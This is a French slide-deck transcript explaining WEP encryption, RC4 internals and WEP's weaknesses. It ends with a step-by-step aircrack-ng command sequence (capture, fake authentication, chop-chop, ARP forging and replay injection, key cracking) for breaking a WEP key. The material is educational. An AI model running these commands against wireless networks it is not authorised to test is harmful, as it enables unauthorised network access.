haking wep

Post on 26-Jun-2015

202 views 1 download

Tags:

description

hacking wep : failles , vulnérabilités et menaces de la clé wep.

Transcript of haking wep

Clé WEP

AFIFI FAISSAL

• Type de réseau – LAN (Local Area Network)– MAN (Metropolitan Area network)– WAN (Wide Area Network)

• Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques– Standards 802.11

TCP/IP

WEP(Wired Equivalent Privacy)

• Qu’est ce que le WEP?– Fait partie de la norme internationale IEEE 802.11– Une solution de confidentialité équivalente à un réseau

filaire– Employé dans un WLAN pour :

» La confidentialité» L’authentification » L’intégrité

WEP(Wired Equivalent Privacy)

• Il est défini comme :– assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes– efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable– optionnel : l’utilisation du WEP est optionnel

Le chiffrement WEP

• Il repose sur l’algorithme à clé symétrique RC4• Le chiffrement se décompose en plusieurs

phases : – La création de la graine :IV+clé– La création du keystream – Le calcul ICV « Integrity Check Value »– La constitution du message final et son encapsulation dans

une trame

L’algorithme RC4 dans WEP

RC4– Symétrique– Chiffrement par flux– Différentes tailles de clé jusqu’à 256 bit– Il est extrêmement rapide

Fonctionement • On génère un flux de données de taille identique au

flux de données claires et on fait un XOR entre les deux

Initialisation de la clé

• Deux longueurs de clé WEP– Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits

GraineIV : vecteur d’initialisation est une séquence de bits qui change régulièrement

Table «S» initialisée

Mélange du tableau KSApour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour

Pseudo Random Generator Algorithm PRGA

Obtention du keystream =>

PRGA(T) :x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z]

Opérations de chiffrement et de déchiffrement

LES FAILLES DU WEP

• Social-Engineering

• cryptanalyse

Les principales failles du WEP sont essentiellement les suivantes :

• Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables.

• Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream.

• L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit.

• • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont

statiques .

• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)

Les faiblesses du IV

IV moins de 17 millions de combinaisons

forte possibilité de Collisions

Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)

Attaques contre le WEP

L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV• Le CRC permet de s’assurer de l’intégrité des données mais en

aucun cas de leur sécurité• L’attaque chop-chop va donc utiliser cette faiblesse pour

injecter des paquets sur le réseau.

Trame1 Trame 2

ajout 1 octet de données

Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.

_____ DATA ___ ___ICV ___D0 D1 D2 D3 D4 I3 I2 I1 I0+ + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8= = = = = = = = =R0 R1 R2 R3 R4 R5 R6 R7 R8

_____ DATA ____ ___ICV ___D0 D1 D2 D3 D4 D5 J3 J2 J1 J0+ + + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8 K9= = = = = = = = = =S0 S1 S2 S3 S4 S5 S6 S7 S8 S9

Suite L’attaque chop-chop

scan des réseaux wifiairodump-ng -w out -c 10 --encrypt wep --bssid

00:16:41:C9:E0:3F wlan0

on se fait passer pour un client: fake authentification

aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38

L'attaque Chopchopaireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor

Forger un paquet ARP avec Packetforge-ngpacketforge-ng -0 -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap

L'injection: Aireplay-ng -3, arp replay#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0

Le crack de la clé wep avec Aircrack-ng#aircrack-ng out-01.cap

Attaques contre RC4

Implementation